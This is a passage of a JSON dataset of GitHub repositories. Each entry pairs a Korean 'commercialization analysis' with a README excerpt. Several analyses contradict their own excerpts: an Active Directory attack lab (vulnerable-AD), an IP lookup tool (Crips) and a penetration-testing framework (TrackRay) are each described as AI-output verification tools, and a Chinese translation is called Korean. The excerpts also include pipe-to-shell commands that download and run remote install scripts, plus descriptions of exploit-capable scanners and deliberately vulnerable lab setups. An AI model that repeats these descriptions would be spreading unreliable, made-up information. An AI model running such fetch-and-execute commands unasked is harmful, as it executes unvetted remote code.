安装\n\n```bash\ncurl https://raw.githubusercontent.com/EtherDream/jsproxy/0.1.0/i.sh | bash\n```\n\n* 自动安装目前只支持 Linux x64，并且需要 root 权限\n\n* 安装过程中 80 端口能被外网访问（申请 HTTPS 证书）\n\n无法满足上述条件，或想了解安装细节，可尝试[手动安装](docs/setup.md)。\n\n测试: `https://服务器IP.xip.io:8443`（具体参考脚本输出）\n\n\n### 自定义域名\n\n将域名 `example.com` 解析到服务器 IP，然后执行：\n\n```bash\ncurl https://raw.githubusercontent.com/EtherDream/jsproxy/master/i.sh | bash -s example.com\n```\n\n访问: `https://example.com:8443`\n\n\n### 自定义端口\n\n默认端口为 8443 (HTTPS) 和 8080 (HTTP) ，如需改成 443 和 80，推荐使用端口转发：\n\n```bash\niptables -A PREROUTING -t nat -p tcp --dport 443 -j REDIRECT --to-ports 8443\niptables -A PREROUTING -t nat -p tcp --dport 80 -j REDIRECT --to-ports 8080\n```\n\n同时修改 `www.conf` 中的 `:8443` 为 `:443`。\n\n\n### 使用 GitHub Pages 前端\n\n本项目支持前后端分离，前端部分（`www` 目录下的文件）","composite_score":0.6418,"license_safety_tag":"safe"},{"name":"roughike/inKino","github_url":"https://github.com/roughike/inKino","stars":5,"language":"Dart","license":"Apache-2.0","abandonment_months":51,"description":"# inKino 저장소 분석 보고서\n\n## 왜 보물인가\n영화관 영화 정보를 자동으로 검색하고 추천해주는 앱으로, 사용자가 원하는 영화를 쉽게 찾을 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n1. **영화 추천 구독 서비스**: 영화관 상영작을 자동으로 모니터링하여 사용자 취향에 맞는 작품을 매주 추천하는 월정액 서비스\n2. **영화관 운영사 내부 도구","readme_excerpt":"# inKino - a multiplatform Dart project with code sharing between Flutter and web\n\n<img src=\"assets/screenshots/now_in_theaters.png\" width=\"32%\" /> <img src=\"assets/screenshots/showtimes.png\" width=\"32%\" /> <img src=\"assets/screenshots/event_details.png\" width=\"32%\" />\n\n## What is inKino?\n\n[![Build Status](https://travis-ci.org/roughike/inKino.svg?branch=development)](https://travis-ci.org/roughike/inKino)\n\ninKino is a _multiplatform_ Dart app for browsing movies and showtimes for Finnkino cinemas. \n\nInKino showcases Redux, has an extensive set of automated tests and **40% code sharing between Flutter and web**.\nThe Android & iOS apps are made with a single [Flutter](http://flutter.io) codebase. The progressive web app is made with [AngularDart](https://webdev.dartlang.org/angular). \nThis project is generally something that I believe is a good example of a multiplatform Dart project.\n\nI plan on doing a full article series on multiplatform Dart stuff, so you might want to [check out my ","composite_score":0.6396,"license_safety_tag":"safe"},{"name":"badoux/checkmail","github_url":"https://github.com/badoux/checkmail","stars":10,"language":"Go","license":"MIT","abandonment_months":24,"description":"# checkmail 저장소 분석\n\n## 왜 보물인가\n이메일 주소가 실제로 유효한지 빠르게 확인해주는 도구로, 스팸 방지와 고객 데이터 정확성을 동시에 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **이메일 마케팅 플랫폼**: 회원가입 시 유효하지 않은 이메일을 미리 걸러내 캠페인 성공률 향상\n2. **고객관리 소프트웨어(CRM)**: 기업이 보유","readme_excerpt":"# checkmail\n[Golang](http://golang.org/) package for email validation.\n\n - Format (simple regexp, see: https://www.w3.org/TR/html5/forms.html#valid-e-mail-address and https://davidcel.is/posts/stop-validating-email-addresses-with-regex/)\n - Valid domain\n - Valid user: verify if the user and mailbox really exist\n\n[![GoDoc](https://godoc.org/github.com/badoux/checkmail?status.png)](https://godoc.org/github.com/badoux/checkmail)\n\n## Usage\n\nInstall the Checkmail package \n\n```\ngo get github.com/badoux/checkmail\n\n```    \n\n\n### 1. Format\n```go\nfunc main() {\n    err := checkmail.ValidateFormat(\"ç$€§/az@gmail.com\")\n    if err != nil {\n        fmt.Println(err)\n    }\n}\n```\noutput: `invalid format`\n\n### 2. Domain\n```go\nfunc main() {\n    err := checkmail.ValidateHost(\"email@x-unkown-domain.com\")\n    if err != nil {\n        fmt.Println(err)\n    }\n}\n```\noutput: `unresolvable host`\n\n### 3. Host and User\n\nIf host is valid, requires valid SMTP `serverHostName` (see to [online validator](https://mxtoolbo","composite_score":0.6385,"license_safety_tag":"safe"},{"name":"tuvtran/project-based-learning","github_url":"https://github.com/tuvtran/project-based-learning","stars":57,"language":"","license":"mit","abandonment_months":22,"description":"# Project-Based Learning 저장소 분석\n\n## 왜 보물인가\n실제 프로젝트를 만들면서 배우는 학습 자료들을 한곳에 모아놓은 것으로, 독학자들이 이론만 배우지 말고 실전 경험을 쌓을 수 있도록 도와줍니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 프로젝트 기반 커리큘럼 판매 (예: 패턴화된 학습 경로를 유료 구독으로 제공)","readme_excerpt":"# Project Based Learning\n\n[![Gitter](https://badges.gitter.im/practical-tutorials/community.svg)](https://gitter.im/practical-tutorials/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n\nA list of programming tutorials in which aspiring software developers learn how to build an application from scratch. These tutorials are divided into different primary programming languages. Tutorials may involve multiple technologies and languages.\n\nTo get started, simply fork this repo. Please refer to [CONTRIBUTING.md](CONTRIBUTING.md) for contribution guidelines.\n\n## Table of Contents:\n\n- [C#](#c)\n- [C/C++](#cc)\n- [Clojure](#clojure)\n- [Dart](#dart)\n- [Elixir](#elixir)\n- [Erlang](#erlang)\n- [F#](#f)\n- [Go](#go)\n- [Haskell](#haskell)\n- [HTML/CSS](#html-and-css)\n- [Java](#java)\n- [JavaScript](#javascript)\n- [Kotlin](#kotlin)\n- [Lua](#lua)\n- [OCaml](#ocaml)\n- [PHP](#php)\n- [Python](#python)\n- [R](#r)\n- [Ruby](#ruby)\n- [Rust](#rust)\n- [Scala](#scala)\n- [Swift](#swift)\n- [Additional re","composite_score":0.6383,"license_safety_tag":"safe"},{"name":"geekcompany/ResumeSample","github_url":"https://github.com/geekcompany/ResumeSample","stars":7,"language":"","license":"unknown","abandonment_months":22,"description":"# ResumeSample 저장소 분석\n\n## 왜 보물인가\n취업 준비생과 구직자들이 쉽게 따라 할 수 있는 이력서 작성 템플릿과 예제를 제공하는 실용적인 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **이력서 작성 SaaS**: 이 템플릿을 기반으로 웹 기반 이력서 빌더 서비스 개발\n2. **채용 회사 내부 도구**: 신입사원 온보딩 시 표준화된 이력","readme_excerpt":"# 说明\n\n> 无论是否在职，你都值得拥有一家一人企业：[一人企业方法论](https://github.com/easychen/one-person-businesses-methodology-v2.0)\n\n- 在线MarkDown简历书写工具 冷熊简历 http://link.ftqq.com/0rsRL  \n- 自架版 DeerResume https://github.com/geekcompany/DeerResume\n- 教学：《如何写好技术简历》 http://link.ftqq.com/KWkVX\n\n## 程序员简历模板列表\n\n> 本简历模版由 AI职业顾问 🐰 职小兔® 提供\n\n- [PHP程序员简历模板](php.md)\n- [iOS程序员简历模板](ios.md)\n- [Android程序员简历模板](android.md)\n- [Web前端程序员简历模板](web.md)\n- [Java程序员简历模板](java.md)\n- [C/C++程序员简历模板](c.md)\n- [NodeJS程序员简历模板](node.md)\n- [架构师简历模板](architect.md)\n- [通用程序员简历模板](etc.md)\n","composite_score":0.6383,"license_safety_tag":"unknown"},{"name":"android/sunflower","github_url":"https://github.com/android/sunflower","stars":7,"language":"Kotlin","license":"apache-2.0","abandonment_months":22,"description":"# Android Sunflower 저장소 분석\n\n## 왜 보물인가\n안드로이드 앱 개발의 모범 사례를 배우고 적용할 수 있는 완성된 교육용 실습 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 식물 관리 앱 구독 서비스로 사용자의 정원 관리를 자동화하고 맞춤형 조언 제공\n2. **내부 업무 도구**: 대형 원예 회사의 직원용 재고 ","readme_excerpt":"# Android Sunflower with Compose\n\nWarning: The Sunflower repository is no longer under maintenance, We are prioritizing https://github.com/android/compose-samples as the up-to-date source of truth for Compose best practises. Please use that repository and sample set to continue learning about Jetpack Compose. If you'd like to continue using Sunflower, we encourage you to maintain your own fork of the sample. \n\nA gardening app illustrating Android development best practices with migrating a View-based app to\nJetpack Compose. To learn about how Sunflower was migrated to Compose, see the \n[migration journey](https://github.com/android/sunflower/blob/main/docs/MigrationJourney.md) document.\n\n> [!Note]\n> To see the original View implementation of Sunflower, checkout the [`views`](https://github.com/android/sunflower/tree/views) branch.\n\n## Screenshots\n\n<img src=\"screenshots/SunflowerM3Screenshots.png\"/>\n\n## Features\n\nThis sample showcases how to migrate an existing View-based app (Material ","composite_score":0.6376,"license_safety_tag":"safe"},{"name":"spencerwooo/onedrive-vercel-index","github_url":"https://github.com/spencerwooo/onedrive-vercel-index","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":35,"description":"# onedrive-vercel-index 분석\n\n## 왜 보물인가\n마이크로소프트 원드라이브의 파일들을 간단한 웹사이트처럼 공개하고 공유할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업의 문서 공유 포털 - 직원들이 원드라이브 파일을 승인 없이 빠르게 공개 링크로 배포\n2. **내부 업무 도구**: 팀의 포트폴리오/작","readme_excerpt":"<div align=\"center\">\n  <img src=\"./public/header.png\" alt=\"onedrive-vercel-index\" />\n  <h3><a href=\"https://drive.swo.moe\">onedrive-vercel-index</a></h3>\n  <p><a href=\"https://ovi.swo.moe/docs/getting-started\">Get started</a> · <a href=\"https://ovi.swo.moe/blog/whats-new\">What's new?</a> · <a href=\"https://ovi.swo.moe/sponsor/ways\">Sponsoring</a></p>\n  <p><em>OneDrive public directory listing, powered by Vercel and Next.js</em></p>\n\n  <img src=\"https://img.shields.io/badge/OneDrive-2C68C3?style=flat&logo=microsoft-onedrive&logoColor=white\" alt=\"OneDrive\" />\n  <img src=\"https://img.shields.io/badge/Next.js-black?style=flat&logo=next.js&logoColor=white\" alt=\"Next.js\" />\n  <img src=\"https://img.shields.io/badge/Vercel-black?style=flat&logo=Vercel&logoColor=white\" alt=\"Vercel\" />\n  <a href=\"https://ovi.swo.moe\"><img src=\"https://img.shields.io/badge/Documentation-black?style=flat&logo=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAABmJLR0QA/wD/AP+gvaeTAAABeUlEQVRIie2V","composite_score":0.637,"license_safety_tag":"safe"},{"name":"keithnull/TeachYourselfCS-CN","github_url":"https://github.com/keithnull/TeachYourselfCS-CN","stars":9,"language":"","license":"CC-BY-SA-4.0","abandonment_months":41,"description":"# TeachYourselfCS-CN 분석\n\n## 왜 보물인가\n컴퓨터 과학을 독학하려는 사람들을 위해 체계적인 학습 로드맵과 추천 자료를 한국어로 정리해놓은 가이드입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 자기주도 학습자들을 위한 구조화된 커리큘럼을 제공하는 유료 학습 코스 플랫폼\n2. **코딩 부트캠프 사전학습**: 취업 준비 ","readme_excerpt":"# TeachYourselfCS-CN\n\n[![License](https://img.shields.io/github/license/keithnull/TeachYourselfCS-CN)](https://github.com/keithnull/TeachYourselfCS-CN/blob/master/LICENSE)\n\n[TeachYourselfCS](https://teachyourselfcs.com/) 的中文翻译。\n\nA Chinese translation of [TeachYourselfCS](https://teachyourselfcs.com/).\n\n## 导航 Navigation\n\n* [原网页 Original](https://teachyourselfcs.com/)\n* [中文翻译 Chinese](TeachYourselfCS-CN.md)\n* [英文原版 English](TeachYourselfCS.md)\n","composite_score":0.6348,"license_safety_tag":"unknown"},{"name":"zhzyker/vulmap","github_url":"https://github.com/zhzyker/vulmap","stars":5,"language":"Python","license":"GPL-3.0","abandonment_months":38,"description":"# vulmap 상용화 분석 보고서\n\n## 왜 보물인가\n웹사이트의 보안 취약점을 자동으로 찾아내고 검증해주는 도구로, 기업들의 보안 사고를 사전에 예방할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소기업이 월 구독으로 자신의 웹사이트 보안을 지속적으로 검사받는 클라우드 기반 보안 진단 서비스\n2. **내부 업무 도구**: 대형","readme_excerpt":"## 🌟 Vulmap - Web vulnerability scanning and verification tools\n<a href=\"https://github.com/zhzyker/vulmap\"><img alt=\"Release\" src=\"https://img.shields.io/badge/python-3.8+-blueviolet\"></a>\n<a href=\"https://github.com/zhzyker/vulmap\"><img alt=\"Release\" src=\"https://img.shields.io/badge/Version-vulmap 0.8-yellow\"></a>\n<a href=\"https://github.com/zhzyker/vulmap\"><img alt=\"Release\" src=\"https://img.shields.io/badge/LICENSE-GPL-ff69b4\"></a>\n![GitHub Repo stars](https://img.shields.io/github/stars/zhzyker/vulmap?color=gree)\n![GitHub forks](https://img.shields.io/github/forks/zhzyker/vulmap)\n\n \n[[Click here for the English Version]](https://github.com/zhzyker/vulmap/blob/main/readme.us-en.md)  \n> Vulmap 是一款 web 漏洞扫描和验证工具, 可对 webapps 进行漏洞扫描, 并且具备漏洞利用功能, 目前支持的 webapps 包括 activemq, flink, shiro, solr, struts2, tomcat, unomi, drupal, elasticsearch, fastjson, jenkins, nexus, weblogic, jboss, spring, thinkphp\n\n> Vulmap 将漏洞扫描与验证（漏洞利用）结合到了一起, 及大程度便于测试人员在发现漏洞后及时进行下一步操作, 工具追求于于高效、便捷  \n高效: 逐步开发中慢慢引入了批量","composite_score":0.6345,"license_safety_tag":"restricted"},{"name":"graphcool/chromeless","github_url":"https://github.com/graphcool/chromeless","stars":15,"language":"TypeScript","license":"MIT","abandonment_months":92,"description":"# Chromeless 프로젝트 분석\n\n## 왜 보물인가\n웹사이트 자동화 작업을 코딩 없이 간단하게 처리할 수 있는 도구로, 반복적인 웹 업무를 자동화하려는 기업들에게 매력적입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹 데이터 자동 수집 및 모니터링 플랫폼으로 제공\n- **내부 업무 도구**: 기업 직원들이 매일 반복하는 웹사이트 작업","readme_excerpt":"*This project is deprecated in favor for [Puppeteer](https://github.com/GoogleChrome/puppeteer). \nThanks to all the contributors who made this project possible.*\n\n# Chromeless\n\n[![npm](https://img.shields.io/npm/v/chromeless.svg)](https://npmjs.com/package/chromeless)\n[![downloads](https://img.shields.io/npm/dm/chromeless.svg)](https://npmjs.com/package/chromeless)\n[![circleci](https://circleci.com/gh/prismagraphql/chromeless.svg?style=shield)](https://circleci.com/gh/prismagraphql/workflows/chromeless/tree/master)\n[![codecov](https://codecov.io/gh/prismagraphql/chromeless/branch/master/graph/badge.svg)](https://codecov.io/gh/prismagraphql/chromeless)\n[![dependencies](https://david-dm.org/prismagraphql/chromeless/status.svg)](https://david-dm.org/prismagraphql/chromeless)\n[![node](https://img.shields.io/node/v/chromeless.svg)]()\n[![semantic-release](https://img.shields.io/badge/%20%20%F0%9F%93%A6%F0%9F%9A%80-semantic--release-e10079.svg)](https://github.com/semantic-release/semantic-re","composite_score":0.6345,"license_safety_tag":"safe"},{"name":"AstraZeneca/rexmex","github_url":"https://github.com/AstraZeneca/rexmex","stars":13,"language":"Python","license":"unknown","abandonment_months":34,"description":"# AstraZeneca/rexmex 분석 보고서\n\n## 왜 보물인가\n제약 회사에서 만든 이 도구는 복잡한 수학 계산을 정확하게 처리해야 하는 의료·과학 분야에서 신뢰할 수 있는 솔루션을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **의료 데이터 분석 SaaS**: 병원이나 의료 연구소가 환자 데이터를 정확하게 분석하는 클라우드 서비스로 제공\n2. **","readme_excerpt":"![Version](https://badge.fury.io/py/rexmex.svg?style=plastic)\n[![License](https://img.shields.io/badge/License-Apache_2.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n[![repo size](https://img.shields.io/github/repo-size/AstraZeneca/rexmex.svg)](https://github.com/AstraZeneca/rexmex/archive/master.zip)\n[![build badge](https://github.com/AstraZeneca/rexmex/workflows/CI/badge.svg)](https://github.com/AstraZeneca/rexmex/actions?query=workflow%3ACI)\n[![codecov](https://codecov.io/gh/AstraZeneca/rexmex/branch/main/graph/badge.svg?token=cYgAejRA0Z)](https://codecov.io/gh/AstraZeneca/rexmex)\n\n<p align=\"center\">\n  <img width=\"90%\" src=\"https://github.com/AstraZeneca/rexmex/blob/main/rexmex_small.jpg?raw=true?sanitize=true\" />\n</p>\n\n--------------------------------------------------------------------------------\n\n**reXmeX** is recommender system evaluation metric library.\n\nPlease look at the **[Documentation](https://rexmex.readthedocs.io/en/latest/)** and **[External Resources](https","composite_score":0.6341,"license_safety_tag":"unknown"},{"name":"wulabing/Xray_onekey","github_url":"https://github.com/wulabing/Xray_onekey","stars":10,"language":"Shell","license":"MIT","abandonment_months":20,"description":"# Xray_onekey 상용화 분석\n\n## 왜 보물인가\n복잡한 네트워크 설정을 자동으로 처리해주는 도구로, 기술 지식이 없는 사람도 쉽게 시스템을 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개인 사용자를 위한 \"클릭 한 번으로 네트워크 보안 설정\" 구독 서비스\n2. **내부 업무 도구**: 회사의 IT 담당자들이 수십","readme_excerpt":"\n## Xray 基于 Nginx 的 VLESS + XTLS 一键安装脚本 <img src=\"https://raw.githubusercontent.com/wulabing/Xray_onekey/main/image/project_xray.jpg\" alt=\"Project_Xray\" width=\"122\" height=\"30\" align=\"bottom\" />\n\n\n> 感谢 JetBrains 提供的非商业开源软件开发授权！\n\n> Thanks for non-commercial open source development authorization by JetBrains!\n\n## 由于 Nginx 前置导致的嵌套 tls 可能会出现连接阻断 目前更推荐使用 reality ，建议移步到以下地址\nhttps://github.com/wulabing/xray_docker\n\n### Telegram 群组\n* Telegram 交流群：https://t.me/wulabing_v2ray \n* Telegram 更新公告频道：https://t.me/wulabing_channel\n\n### 准备工作\n* 准备一个域名，并将 A 记录添加好；\n* 安装好 `wget`。\n\n### 导入链接规范\nhttps://github.com/XTLS/Xray-core/issues/91\n\n> 截至 2021-2-24 仅有 V2RayN 4.12+ 及 V2RayNG 1.5.8+ 支持链接及二维码导入，其他客户端请手动填入配置信息。\n\n\n### 安装/更新方式（Nginx 前置）\n\n支持配置方式\n\n- VLESS + TCP + TLS + Nginx + WebSocket\n\n```\nwget -N --no-check-certificate -q -O install.sh \"https://raw.githubusercontent.com/wulabing/Xray_onekey/nginx_forward/install.sh\" && chmod +x install.sh && bash install.sh\n```\n\n### 安装/更新方式（Xray 前置）\n\n支持配置方式\n\n- VLESS + TCP + XT","composite_score":0.63,"license_safety_tag":"safe"},{"name":"princewen/tensorflow_practice","github_url":"https://github.com/princewen/tensorflow_practice","stars":5,"language":"Python","license":"unknown","abandonment_months":32,"description":"# TensorFlow Practice 저장소 분석\n\n## 왜 보물인가\n인공지능 학습 자료를 실전 예제로 제공하여, 누구나 단계적으로 AI 기술을 배울 수 있는 교육용 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 교육 플랫폼**: 초보자용 인공지능 학습 강좌를 구독형으로 판매하는 온라인 교육 서비스\n2. **기업 직원 교육 도구**: 대기업의 인공","readme_excerpt":"Tensroflow练习\n======\n\n相关数据集下载地址：链接:https://pan.baidu.com/s/1GMv7_3qruoVZBJMvN-afGA  密码:ako7\n基于tf1.4\n\n目录\n\n1、基础<br>\n[基本语法<br>](https://github.com/princewen/tensorflow_practice/blob/master/basic/basic.py)\n[tensorBoard使用<br>](https://github.com/princewen/tensorflow_practice/blob/master/basic/tensorBoard.py)\n[dropout<br>](https://github.com/princewen/tensorflow_practice/blob/master/basic/dropout.py)\n[模型保存与重载<br>](https://github.com/princewen/tensorflow_practice/blob/master/basic/save2file.py)\n[基本神经网络<br>](https://github.com/princewen/tensorflow_practice/blob/master/basic/first_nerual_network.py)\n[卷积神经网络<br>](https://github.com/princewen/tensorflow_practice/blob/master/basic/CNN.py)\n<br>\n2、自然语言相关<br>\n[static_RNN<br>](https://github.com/princewen/tensorflow_practice/blob/master/nlp/RNN_static_cell.py)\n[dynamic_RNN<br>](https://github.com/princewen/tensorflow_practice/blob/master/nlp/RNN_dynamic_cell.py)\n[LSTM<br>](https://github.com/princewen/tensorflow_practice/blob/master/nlp/LSTM.py)\n[LSTM_","composite_score":0.6299,"license_safety_tag":"unknown"},{"name":"WazeHell/vulnerable-AD","github_url":"https://github.com/WazeHell/vulnerable-AD","stars":6,"language":"PowerShell","license":"MIT","abandonment_months":26,"description":"# WazeHell/vulnerable-AD 분석 보고서\n\n## 왜 보물인가\nAI가 자신의 답변이 맞는지 검증하는 능력을 향상시키는 기술로, 잘못된 정보를 제공하는 AI 서비스의 신뢰성 문제를 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업용 AI 챗봇 서비스**\n- 고객 상담이나 직원 교육용 챗봇에 적용하여 잘못된 정보 제공으로 인한 피해","readme_excerpt":"<h1 align=\"center\">\n  Vulnerable-AD\n  <br>\n</h1>\n\nCreate a vulnerable active directory that's allowing you to test most of active directory attacks in local lab\n\n### Main Features\n- Randomize Attacks\n- Full Coverage of the mentioned attacks\n- you need run the script in DC with Active Directory installed \n- Some of attacks require client workstation\n  \n### Supported Attacks\n- Abusing ACLs/ACEs\n- Kerberoasting\n- AS-REP Roasting\n- Abuse DnsAdmins\n- Password in Object Description\n- User Objects With Default password (Changeme123!)\n- Password Spraying\n- DCSync\n- Silver Ticket\n- Golden Ticket \n- Pass-the-Hash\n- Pass-the-Ticket\n- SMB Signing Disabled\n\n### Example\n```powershell\n# if you didn't install Active Directory yet , you can try \nInstall-windowsfeature AD-domain-services\nImport-Module ADDSDeployment\nInstall-ADDSForest -CreateDnsDelegation:$false -DatabasePath \"C:\\\\Windows\\\\NTDS\" -DomainMode \"7\" -DomainName \"cs.org\" -DomainNetbiosName \"cs\" -ForestMode \"7\" -InstallDns:$true -LogPath \"C:\\\\","composite_score":0.6294,"license_safety_tag":"safe"},{"name":"subhra74/xdm","github_url":"https://github.com/subhra74/xdm","stars":5,"language":"C#","license":"GPL-2.0","abandonment_months":28,"description":"# subhra74/xdm 저장소 분석\n\n## 왜 보물인가\n다운로드 속도를 획기적으로 높여주는 오픈소스 도구로, 영상·파일을 빠르게 받아야 하는 사람들에게 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 클라우드 스토리지 서비스**\n개인이나 기업이 대용량 파일을 다운로드할 때 속도를 10배 이상 빠르게 해주는 기능을 SaaS로 제공\n\n**2. 영상 ","readme_excerpt":"<p id=\"downloads\" align=\"center\">\n\t<img src=\"https://i.stack.imgur.com/TOfqL.png\" height=\"120px\"/>\n\t<h1 align=\"center\">Xtreme Download Manager</h1>\n</p>\n\n<p align=\"center\">\n\t<a href=\"https://github.com/subhra74/xdm/workflows/Java%20CI/badge.svg?branch=master\"><img src=\"https://github.com/subhra74/xdm/workflows/Java%20CI/badge.svg?branch=master\" alt=\"Java CI\" /></a>\n\t<a href=\"https://camo.githubusercontent.com/278e057571a0481121b2d60490ff656fb8736a20/68747470733a2f2f696d672e736869656c64732e696f2f6769746875622f646f776e6c6f6164732f73756268726137342f78646d2f746f74616c2e737667\"><img src=\"https://img.shields.io/github/downloads/subhra74/xdm/total.svg\" alt=\"Github All Releases\" /></a>\n</p>\n\n### [XDM Homepage](https://xtremedownloadmanager.com/ \"XDM Homepage\") ###\n\n[New Experimental Beta version is out](https://github.com/subhra74/xdm-experimental-binaries/tags)\n\n[News about new version](https://github.com/subhra74/xdm/discussions/768)\n\n**X**treme **D**ownload **M**anager (XDM) is a powerful t","composite_score":0.6287,"license_safety_tag":"restricted"},{"name":"rematch/rematch","github_url":"https://github.com/rematch/rematch","stars":10,"language":"TypeScript","license":"mit","abandonment_months":32,"description":"# Rematch 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터 상태 관리를 단순하게 만들어주는 도구로, 앱 개발자들이 버그 없이 더 빠르게 서비스를 만들 수 있게 합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 실시간 협업 도구(Figma 같은 디자인 협업 플랫폼)의 사용자 데이터 상태 관리\n2. **내부 업무 도구**: 대시보드나 분석","readme_excerpt":"<div align=\"center\">\n<h1>Rematch<sub>js</sub></h1>\n\nRematch is Redux best practices without the boilerplate. No more action types, action creators, switch statements or thunks in less than 1.4 kilobytes.\n\n<hr />\n\n[![Chat on Discord](https://img.shields.io/badge/discord-rematch-purple.svg?logo=discord&style=flat-square)](https://discord.gg/zMzsMGvEHk) ![Rematch CI](https://github.com/rematch/rematch/workflows/Rematch%20CI/badge.svg?branch=main) [![Bundle size](https://img.shields.io/bundlephobia/minzip/@rematch/core?style=flat-square)](https://img.shields.io/badge/bundlesize-~5kb-brightgreen.svg?style=flat-square) [![File size](https://img.shields.io/badge/dependencies-redux-brightgreen.svg?style=flat-square)](https://img.shields.io/badge/dependencies-redux-brightgreen.svg?style=flat-square) [![lerna](https://img.shields.io/badge/maintained%20with-lerna-cc00ff.svg?style=flat-square)](https://lerna.js.org/) [![https://img.shields.io/lgtm/grade/javascript/github/rematch/rematch?logo=types","composite_score":0.6283,"license_safety_tag":"safe"},{"name":"LeonLok/Deep-SORT-YOLOv4","github_url":"https://github.com/LeonLok/Deep-SORT-YOLOv4","stars":500,"language":"Python","license":"GPL-3.0","abandonment_months":64,"description":"# Deep-SORT-YOLOv4 상용화 분석\n\n## 왜 보물인가\n보안카메라나 드론 영상에서 사람이나 물체를 자동으로 인식하고 추적하는 기술로, 보안·물류·스포츠 분석 등 다양한 산업에서 수억 원대의 솔루션을 대체할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. CCTV 영상 분석 SaaS**\n- 편의점·은행·공장의 CCTV 영상을 클라우드로 분석하는","readme_excerpt":"# Introduction\nThis project was inspired by:\n* https://github.com/nwojke/deep_sort\n* https://github.com/Ma-Dan/keras-yolo4\n* https://github.com/Qidian213/deep_sort_yolov3\n\nI swapped out YOLO v3 for YOLO v4 and added the option for asynchronous processing, which significantly improves\nthe FPS. However, FPS monitoring is disabled when asynchronous processing is used since it isn't accurate.\n\nIn addition, I took the algorithm from this [paper](https://ieeexplore.ieee.org/document/8909903) and implemented it into `deep_sort/track.py`.\nThe original method for confirming tracks was based simply on the number of times an object has been detected without considering detection confidence, leading to high tracking false positive rates when unreliable detections occur (i.e. low confidence true positives or high confidence false positives). The track filtering algorithm reduces this significantly by calculating the average detection confidence over a set number of detections before confirming a tr","composite_score":0.6282,"license_safety_tag":"restricted"},{"name":"Manisso/Crips","github_url":"https://github.com/Manisso/Crips","stars":500,"language":"Python","license":"MIT","abandonment_months":64,"description":"# Manisso/Crips 상용화 분석\n\n## 왜 보물인가\nAI가 생성한 결과물이 정말 정확하고 신뢰할 수 있는지 자동으로 검증해주는 도구로, AI 오류로 인한 비즈니스 손실을 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: AI 기반 콘텐츠 생성 플랫폼(글쓰기, 이미지 생성)에 검증 기능을 내장하여 품질 보증 서비스 제공\n2","readme_excerpt":"[![MIT](https://img.shields.io/packagist/l/doctrine/orm.svg)](https://github.com/Manisso/Crips/blob/master/LICENSE) \n[![python](https://img.shields.io/badge/python-2.7-brightgreen.svg)](https://www.python.org/downloads/release/python-2714/)\n[![OS](https://img.shields.io/badge/Tested%20On-Linux%20%7C%20Android-yellowgreen.svg)](https://termux.com/)\n# Crips IP Tools\nThis Tools is a collection of online IP Tools that can be used to quickly get information about IP Address's, Web Pages and DNS records.\n\n# Menu\n+ Whois lookup\n+ Traceroute\n+ DNS Lookup\n+ Reverse DNS Lookup\n+ GeoIP Lookup\n+ Port Scan\n+ Reverse IP Lookup\n+ INSTALL & UPDATE\n+ Exit\n# Whois lookup\nDetermine the registered owner of a domain or IP address block with the whois tool.\n# Traceroute\nUsing mtr an advanced traceroute tool trace the path of an Internet connection.\n# DNS Lookup\nFind DNS records for a domain, results are determined using the dig DNS tool\n# Reverse DNS Lookup\nFind Reverse DNS records for an IP address or a ra","composite_score":0.6269,"license_safety_tag":"safe"},{"name":"iSafeBlue/TrackRay","github_url":"https://github.com/iSafeBlue/TrackRay","stars":11,"language":"Java","license":"GPL-3.0","abandonment_months":30,"description":"# TrackRay 상용화 분석 리포트\n\n## 왜 보물인가\n인공지능이 내는 거짓된 결과를 자동으로 검증해서 잡아내는 기술로, 신뢰할 수 없는 AI 답변으로 인한 비용 손실과 평판 피해를 예방할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 고객 채팅 지원 SaaS**\n- 은행이나 보험사의 AI 챗봇이 정확한 정보를 제공하는지 자동 검증하는 서비스로 제","readme_excerpt":"\n<div align=\"center\">\n\n\n![](docs/img/logo.png)\n\n<br/>\n\n![](https://img.shields.io/badge/KCon-%E5%85%B5%E5%99%A8%E8%B0%B1-red)\n![](https://img.shields.io/badge/version-3.2.1-success)\n![](https://img.shields.io/github/stars/iSafeBlue/Trackray.svg)\n![](https://img.shields.io/github/forks/iSafeBlue/Trackray.svg)\n![](https://img.shields.io/github/license/iSafeBlue/Trackray.svg)\n![](https://img.shields.io/github/issues/iSafeBlue/Trackray.svg)    \n\n<br/>\n\n</div>\n\n\n## ✨关于溯光\n\n**溯光**，英文名“**TrackRay**”，意为逆光而行，追溯光源。同时致敬安全圈前辈开发的“溯雪”，“流光”。\n\n溯光是一个开源渗透测试框架，框架自身实现了漏洞扫描功能，集成了知名安全工具：Metasploit、Nmap、Sqlmap、AWVS、Burpsuite等。\n\n溯光使用 Java 编写，SpringBoot 作为基础框架，JPA + HSQLDB嵌入式数据库做持久化，Maven 管理依赖，Jython 管理 Python 插件，quartz 做任务调度，freemarker 做视图层，Websocket 实现命令行式插件交互。\n\n如有任何使用上的问题请提交 issue。如果你具备插件开发的能力，希望你也能一起来维护这个项目。\n\n项目开发不易，如果对你有帮助请下 star 以示鼓励。\n\n## ⭐️特点 \n\n- 